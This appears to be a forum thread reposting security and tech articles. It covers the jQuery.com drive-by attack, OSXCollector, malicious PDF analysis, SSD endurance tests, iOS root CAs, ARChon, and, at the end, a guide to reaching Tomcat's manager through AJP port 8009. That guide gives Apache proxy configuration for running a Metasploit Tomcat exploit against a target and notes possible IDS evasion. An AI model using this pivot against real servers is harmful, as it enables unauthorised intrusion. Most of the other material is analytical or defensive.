According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit.

The RIG exploit kit was recently seen in several malvertising campaigns. The exploit kit is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload.

After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used.
The redirector domain utilized in the attack (jquery-cdn[.]com) is hosted in Russia and it was registered on September 18, the day on which the attack started. Fortunately, the administrators of jQuery.com removed the malicious code, but the redirector domain is still online as of September 23.

The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked.

Sursa: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
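Injections of this kind usually surface as a zero-sized or CSS-hidden iframe dropped into otherwise legitimate markup. A quick triage pass for that pattern might look like the following (a heuristic sketch; real pages need a proper DOM renderer and many more checks, and the URL below is a placeholder, not the real redirector):

```python
from html.parser import HTMLParser

class HiddenIframeFinder(HTMLParser):
    """Collect iframe src values that are sized to be invisible or
    hidden via inline CSS, a common drive-by redirect marker."""
    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = a.get("width") == "0" or a.get("height") == "0"
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.suspicious.append(a.get("src", ""))

def find_hidden_iframes(html: str) -> list:
    finder = HiddenIframeFinder()
    finder.feed(html)
    return finder.suspicious

page = '<p>hi</p><iframe src="http://redirector.example/gate" width="0" height="0"></iframe>'
```

Attackers also build such iframes dynamically with obfuscated JavaScript, which a static scan like this will miss; it only catches the lazy variant.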
  13. How'd that malware get there?

That's the question you've got to answer for every OS X malware infection. We built OSXCollector to make that easy: quickly parse its output to get an answer.

A typical infection might follow a path like:
- a phishing email leads to a malicious download
- once installed, the initial payload establishes persistence
- then it reaches out on the network and pulls down additional payloads

With the output of OSXCollector we can quickly correlate between browser history, startup items, downloads, and installed applications. It makes it easy to root-cause an infection, collect IOCs, and get to the bottom of what happened.

So what does it do?

OSXCollector gathers information from plists, SQLite databases and the local filesystem to get the information needed for analyzing a malware infection. The output is JSON, which makes it easy to process further with other tools.

Usage

The tool is self-contained in one script file, osxcollector.py. Launch OSXCollector as root or it will be unable to read data from all accounts:

$ sudo ./osxcollector.py

Before running the tool make sure that your web browsers (Safari, Chrome or Firefox) are closed. Otherwise OSXCollector will not be able to access their diagnostic files for collecting the data.

Sursa: https://github.com/Yelp/osxcollector
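Because the output is line-delimited JSON, correlating across sections can be as simple as sweeping every record for an indicator. A sketch of that idea (the osxcollector_section key and the sample records are assumptions for illustration, not necessarily the tool's exact schema):

```python
import json

def records_mentioning(lines, indicator):
    """Group every JSON record containing `indicator` by the section
    it was collected from (downloads, browser history, startup, ...)."""
    hits = {}
    for line in lines:
        record = json.loads(line)
        if indicator in json.dumps(record):
            section = record.get("osxcollector_section", "unknown")
            hits.setdefault(section, []).append(record)
    return hits

sample = [
    '{"osxcollector_section": "downloads", "path": "/Users/a/Downloads/evil.dmg", "url": "http://bad.example/evil.dmg"}',
    '{"osxcollector_section": "chrome_history", "url": "http://bad.example/landing"}',
    '{"osxcollector_section": "startup", "path": "/Library/LaunchAgents/com.ok.plist"}',
]
```

Seeing the same domain in both a download record and the browser history is exactly the kind of correlation that reconstructs the infection path described above.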
  14. Malicious Documents – PDF Analysis in 5 steps

Mass mailing or targeted campaigns that use common files to host or exploit code have been, and remain, a very popular vector of attack. In other words: a malicious PDF or MS Office document received via e-mail or opened through a browser plug-in. In regards to malicious PDF files, the security industry saw a significant increase of vulnerabilities after the second half of 2008, which might be related to Adobe Systems' release of the specifications, format structure and functionality of PDF files.

Most enterprise network perimeters are protected and contain several security filters and mechanisms that block threats. However, a malicious PDF or MS Office document might be very successful at passing through firewalls, intrusion prevention systems, anti-spam, anti-virus and other security controls. By reaching the victim's mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document.

Then, for example, if the user opens a malicious PDF file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap, causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could be exploited without even opening the file, just by having the malicious file on the hard drive, as described by Didier Stevens.

From a 100-foot view, a PDF file is composed of a header, body, cross-reference table and trailer. One key component is the body, which might contain all kinds of content-type objects that make parsing attractive for vulnerability researchers and exploit developers.
The language is very rich and complex, which means the same information can be encoded and obfuscated in many ways. For example, within objects there are streams that can be used to store data of any type and size. These streams are compressed, and the PDF standard supports several algorithms, called Filters, including ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode and DCTDecode. PDF files can contain multimedia content and support JavaScript and ActionScript through Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques, making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All these features and capabilities translate into a huge attack surface!

From a security incident response perspective, knowing how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of file, an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore, it can help one be better prepared to identify future security incidents and to contain, eradicate and recover from those threats.

So which steps could an incident handler or malware analyst perform to analyze such files? In the case of malicious PDF files there are 5 steps. Using the REMnux distro, the steps are described by Lenny Zeltser as being:

1. Find and extract JavaScript
2. Deobfuscate JavaScript
3. Extract the shellcode
4. Create a shellcode executable
5. Analyze the shellcode and determine what it does

A summary of tools and techniques for analyzing malicious documents with REMnux is given in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and provide an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps.
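Stream filters are less exotic than they sound: /FlateDecode, by far the most common one, is plain zlib compression. A sketch of how a stream body hides and then yields its content (the "JavaScript" here is a harmless stand-in, not real exploit code):

```python
import zlib

def flate_decode(stream_body: bytes) -> bytes:
    """Undo a /FlateDecode filter: the bytes between the PDF keywords
    'stream' and 'endstream' are ordinary zlib-compressed data."""
    return zlib.decompress(stream_body)

# Simulate what a malicious document does: pack script into a stream
# so that a naive grep over the raw file never sees it.
payload = b"app.alert('I would be hidden inside a PDF stream');"
stream_body = zlib.compress(payload)
assert b"app.alert" not in stream_body  # invisible to plain string search
```

This is why keyword scanning alone is not enough and tools like pdf-parser decode the filters before inspecting object contents.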
The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of the Adobe Reader JavaScript engine to exploit CVE-2013-2729. This vulnerability, found by Felipe Manzano, exploits an integer overflow in several versions of Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on VirusTotal was detected by only 6 of the 55 AV engines. Let's go through each of the mentioned steps to find information on the malicious PDF's key characteristics and its capabilities.

1st Step – Find and extract JavaScript

One technique is to use Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contains some of these keywords. In this case the first observation shows the PDF file contains 6 objects and 2 streams. No JavaScript is mentioned, but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms, which might indicate it is malicious.

Then, looking deeper, we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity, but in this case Object 2 is the /XFA element referencing Object 1, which contains a stream that is compressed and rather suspicious. Following this indicator, pdf-parser.py allows us to show the contents of an object and pass the stream through one of the supported filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) with the --filter switch. The --raw switch shows the output in an easier-to-read form. The output of the command is redirected to a file, and looking at the contents of this file we get the decompressed stream.
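The keyword triage that pdfid performs can be approximated in a few lines. A simplified sketch (the real tool also normalises hex-escaped names like /J#61vaScript and handles many more keywords, which this skips):

```python
import re

SUSPICIOUS = [b"/JavaScript", b"/JS", b"/AcroForm", b"/XFA", b"/OpenAction", b"/Launch"]

def keyword_counts(pdf_bytes: bytes) -> dict:
    """Count risky PDF name occurrences, pdfid-style, over raw bytes."""
    return {kw.decode(): len(re.findall(re.escape(kw), pdf_bytes))
            for kw in SUSPICIOUS}

# A minimal fake document showing the /AcroForm + /XFA pattern seen above.
fake_pdf = b"%PDF-1.6\n1 0 obj << /AcroForm 2 0 R >>\n2 0 obj << /XFA 1 0 R >>\n%%EOF"
```

A hit on /XFA or /AcroForm is not proof of malice, only a cue to decode the referenced streams and look deeper, exactly as the analysis above does.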
When inspecting this file you will see several lines of JavaScript that weren't visible in the original PDF file. If this document is opened by a victim, the /XFA keyword will execute this malicious code.

Another fast method to find out whether the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, and execute JavaScript and shellcodes. When running the malicious PDF file against the latest version of the tool, it can show very useful information about the PDF structure and its contents, and can even detect which vulnerability it triggers in case it has a signature for it.

2nd Step – Deobfuscate JavaScript

The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation, and in this case there was quite some manual cleanup of the extracted code just to get the code isolated. The object.raw file contained 4 JavaScript elements between <script xxxx contentType="application/x-javascript"> tags and 1 image in base64 format in an <image> tag. This JavaScript code between tags needs to be extracted and placed into a separate file. The same can be done for the chunk of base64 data, which when decoded will produce a 67MB BMP file.

The JavaScript in this case was rather cryptic, but there are tools and techniques that help do the job of interpreting and executing the code. In this case I used another tool called js-didier.pl, which is Didier's version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows you to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and print the results into files named eval.00x.log.
I got some errors on one of the variables due to the manual cleanup, but it was enough to produce several eval log files with interesting results.

3rd Step – Extract the shellcode

The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. Among other things, the file contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode; typically you find shellcode in JavaScript encoded in this way. These Unicode-encoded strings need to be converted into binary. To do this, isolate the Unicode-encoded strings into a separate file and convert the Unicode (\u) notation to hex (\x) notation. This is done with a series of Perl regular expressions in a REMnux script called unicode2hex-escaped. The resulting file will contain the shellcode in hex format ("\xeb\x06\x00\x00..") that will be used in the next step to convert it into a binary.

4th Step – Create a shellcode executable

Next, with the shellcode encoded in hexadecimal format, we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py, written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states: "The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its behavior. This approach is useful for analyzing shellcode that's difficult to understand without stepping through it with a debugger."

5th Step – Analyze the shellcode and determine what it does

The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case, static analysis of the shellcode using the strings command shows several API calls used by the shellcode.
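Stepping back to the conversion in the 3rd step for a moment: it is mechanical enough to script, since each \uXXXX escape packs two shellcode bytes in little-endian order. A Python equivalent of the unicode2hex-escaped idea (a sketch, not the REMnux script itself):

```python
import re
import struct

def unicode_escaped_to_bytes(s: str) -> bytes:
    """Turn shellcode packed as %uXXXX or \\uXXXX escapes into raw bytes.
    Each 16-bit escape is little-endian, so '\\u06eb' yields b'\\xeb\\x06',
    matching the "\\xeb\\x06..." hex notation used in the next step."""
    out = bytearray()
    for word in re.findall(r"(?:%u|\\u)([0-9a-fA-F]{4})", s):
        out += struct.pack("<H", int(word, 16))
    return bytes(out)
```

The byte order is the part people get wrong by hand; one swapped pair is enough to turn a working sample into garbage in the debugger.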
Further analysis also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed. We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify whether machines have been compromised and have attempted to download the malicious executable. At the time of this analysis the file was no longer there, but it is known to be a variant of the Game Over Zeus malware.

The steps followed are manual, but with practice they are repeatable. They represent just a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 steps that can be used as a framework to discover indicators of compromise that will reveal machines compromised by the same bad guys. However, using these 5 steps many other questions could be answered. With the mentioned and other tools and techniques within the 5 steps, we can gain a better practical understanding of how malicious documents work and which methods are used by evildoers.

Two great resources for this type of analysis are the Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code book by Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques course.

Sursa: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
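The strings pass that surfaced the download URL can itself be scripted, making the IOC extraction repeatable across samples. A small sketch (the URL below is a made-up placeholder, not the real IOC from this sample):

```python
import re

def extract_urls(blob: bytes) -> list:
    """strings-style sweep of a decoded shellcode blob: keep printable
    ASCII runs, then pull anything URL-shaped out as network IOCs."""
    urls = []
    for run in re.findall(rb"[ -~]{6,}", blob):
        urls += re.findall(rb"https?://[^\s\"'<>]+", run)
    return [u.decode() for u in urls]

# Fake blob: opcodes, API names the strings pass would reveal, and a URL.
shellcode = (b"\x90\x90\xebLoadLibraryA\x00URLDownloadToFileA\x00"
             b"http://dropzone.example/payload.exe\x00")
```

Download-and-execute shellcode frequently leaves both the API names (URLDownloadToFileA and friends) and the URL in the clear once the Unicode layer is stripped, which is why this crude pass is often enough.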
  15. The SSD Endurance Experiment: Only two remain after 1.5PB
Another one bites the dust
by Geoff Gasior — 11:35 AM on September 19, 2014

You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most.

Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though, and you won't believe which one. Seriously, you won't. But I'll stop now.

To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today.

Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem.

Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside minuscule cells built with process geometries as small as 16 nm.
The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch, and there always is one, is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area.

Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result.

As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffered a rash of reallocated sectors, programming failures, and erase failures before its ultimate demise.

Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors, split between an initial spate at 300TB and a second accumulation near the end of the road.
So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: over the last 100TB, the Neutron compensated for over 3400 sector failures.

And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it.

Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible.

We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm.
Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests.

Now that we've tended to the dead, it's time to check in on the living...

Articol complet: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
  16. An Analysis of the CAs trusted by iOS 8.0
Posted on September 22, 2014 by Karl Kornel

iOS 8.0 ships with a number of trusted certificates (also known as "root certificates" or "certificate authorities"), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, and any intermediate certificates needed to make a "chain of trust" back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site's certificate because it trusts a root certificate.

iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I'm going to take a look at these 222 certificates. First I'm going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I'm going to look at who owns these trusted roots.

Perl is Awesome

Before I go on, a quick shout-out: Perl is awesome! I used a Perl script to parse Apple's list, and to generate the numbers below. If you want the script, here it is:
- The quick-and-dirty Perl script (signature)
- The list of CAs (signature)

Key Sizes

The root certificates use either RSA or ECC for their keys. Here's how the numbers break down:
- 4096-bit RSA: 44 CAs
- 2048-bit RSA: 138 CAs
- 1024-bit RSA: 27 CAs
- 384-bit ECC: 12 CAs
- 256-bit ECC: 1 CA

On the RSA side, the numbers don't surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys rather than move to ECC (or did so before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that's good, but I am concerned by the algorithm choices.
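The aggregation itself is trivial once the certificate list is parsed. Here is the same kind of tally sketched in Python with a synthetic input (the author's actual script is Perl, and this toy list is obviously not Apple's 222-entry one):

```python
from collections import Counter

def tally(cas):
    """Count CAs by key type/size and by signature hash, given a list of
    (key_algorithm, key_bits, signature_hash) tuples."""
    by_key = Counter(f"{bits}-bit {alg}" for alg, bits, _ in cas)
    by_hash = Counter(h for _, _, h in cas)
    return by_key, by_hash

toy_list = [
    ("RSA", 2048, "SHA-1"),
    ("RSA", 2048, "SHA-256"),
    ("RSA", 4096, "SHA-256"),
    ("ECC", 384, "SHA-384"),
]
```

The hard part in practice is the parsing and the certificate decoding, not the counting; a library such as pyca/cryptography would do the decoding step.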
The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves is trustworthy, according to SafeCurves.

I would not be surprised if the number of ECC keys stays stable and the number of RSA 4096-bit keys goes up. Most (if not all) of the widely-supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves into web browsers and servers.

Signature Hashes

When we look at the hashing algorithms used to sign these root certificates, SHA is the order of the day:
- SHA-512: 1 CA
- SHA-384: 17 CAs (including 12 of the CAs using ECC keys)
- SHA-256: 42 CAs (including 1 of the CAs using ECC keys)
- SHA-1: 149 CAs
- MD-5: 10 CAs
- MD-2: 3 CAs

First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren't used here, so I'm ignoring them!

Again we see the slow move away from SHA-1, and that's good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really?

Looking at MD-5, both Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original "Class 1,2,3 Public Primary Certification Authority" CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong!

This inclusion really surprises me: if you try to load your own MD-5 root certificate into iOS, it will not be trusted.
And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms.

Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not.

Certificate Owners

Companies

It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0:
- AC Camerfirma SA: 4 CAs
- Apple: 4 CAs
- Comodo: 4 CAs
- Digicert: 8 CAs
- Entrust: 5 CAs
- Geotrust: 4 CAs
- Globalsign: 6 CAs
- Netlock Kft: 5 CAs
- Symantec: 6 CAs
- TC Trustcenter GMBH: 6 CAs
- Thawte: 12 CAs
- The Usertrust Network: 5 CAs
- Verisign: 17 CAs

All told, Symantec owns thirty-five CAs, thanks to Verisign's purchase of Thawte, and Symantec's purchase of Verisign. I don't hold that against Symantec, though: most of the CAs were issued before the purchase, and it's too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: how many certificate authorities does one company actually need?

Governments

There are a number of governments whose CAs are included in iOS 8.0:
- China: 1 CA, via the China Internet Network Information Center
- Hong Kong: 1 CA, via the Hongkong Post e-Cert
- Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT)
- Netherlands: 3 CAs, via PKIoverheid
- Taiwan: 1 CA, via the Government Root Certification Authority
- Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey
- United States: 5 CAs, via the Department of Defense

Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there's no need to crack the encryption, and you probably don't even need an inside line to Verisign!
You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or ...) using one of your own governmental CAs, which iOS already recognizes.

Unfortunately, I can not see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can't tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites.

Final Thoughts

First of all, it's good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of a site's certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension?

The security-conscious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing.

There is no way to disable any of the root CAs that come with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don't like? With all the work that Apple does to secure iOS devices, I trust Apple enough to take it. I'm going to continue using my iPhone 5, with iOS 8.0.

Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
  17. Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows See the custom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
  18. 8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is that you can also access that manager interface on port 8009. This is the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It is an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles. It’s not often that you encounter port 8009 open and ports 8080, 8180, 8443 or 80 closed, but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it, right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first); what follows is just an overview of the commands I used on my own machine. I omitted some of the original instructions since they didn’t seem to be necessary. 
(apache must already be installed)

sudo apt-get install libapache2-mod-jk

sudo vim /etc/apache2/mods-available/jk.conf

# Where to find workers.properties
# Update this path to match your conf directory location
JkWorkersFile /etc/apache2/jk_workers.properties
# Where to put jk logs
# Update this path to match your logs directory location
JkLogFile /var/log/apache2/mod_jk.log
# Set the jk log level [debug/error/info]
JkLogLevel info
# Select the log format
JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
# JkOptions indicate to send SSL KEY SIZE,
JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
# JkRequestLogFormat set the request format
JkRequestLogFormat "%w %V %T"
# Shm log file
JkShmFile /var/log/apache2/jk-runtime-status

sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf

sudo vim /etc/apache2/jk_workers.properties

# Define 1 real worker named ajp13
worker.list=ajp13
# Set properties for worker named ajp13 to use ajp13 protocol,
# and run on port 8009
worker.ajp13.type=ajp13
worker.ajp13.host=localhost
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300

sudo vim /etc/apache2/sites-enabled/000-default

JkMount /* ajp13
JkMount /manager/ ajp13
JkMount /manager/* ajp13
JkMount /host-manager/ ajp13
JkMount /host-manager/* ajp13

sudo a2enmod proxy_ajp
sudo a2enmod proxy_http
sudo /etc/init.d/apache2 restart

Don’t forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. 
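Before wiring up the full mod_jk proxy, it can be handy to confirm that the target port really speaks AJP. The protocol defines a CPing/CPong keepalive exchange; below is a minimal probe sketched in Python. The magic bytes and prefix codes are taken from the AJPv13 documentation listed in the references; the host in the example call is an assumption.

```python
import socket

AJP_MAGIC_REQ = b"\x12\x34"   # client -> container packet magic (AJPv13)
AJP_MAGIC_RESP = b"AB"        # container -> client packet magic
CPING, CPONG = 0x0A, 0x09     # keepalive prefix codes

def build_cping() -> bytes:
    """AJP packet: magic, 2-byte big-endian payload length, then payload."""
    payload = bytes([CPING])
    return AJP_MAGIC_REQ + len(payload).to_bytes(2, "big") + payload

def is_cpong(reply: bytes) -> bool:
    """True if the reply starts with a well-formed CPong packet."""
    return reply[:2] == AJP_MAGIC_RESP and len(reply) >= 5 and reply[4] == CPONG

def probe_ajp(host: str, port: int = 8009, timeout: float = 3.0) -> bool:
    """Send a CPing and report whether the service answered with a CPong."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_cping())
        return is_cpong(s.recv(16))

# Example (requires a reachable Tomcat AJP connector):
# print(probe_ajp("192.168.195.155"))
```

If the probe returns True, the mod_jk setup is worth the effort.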
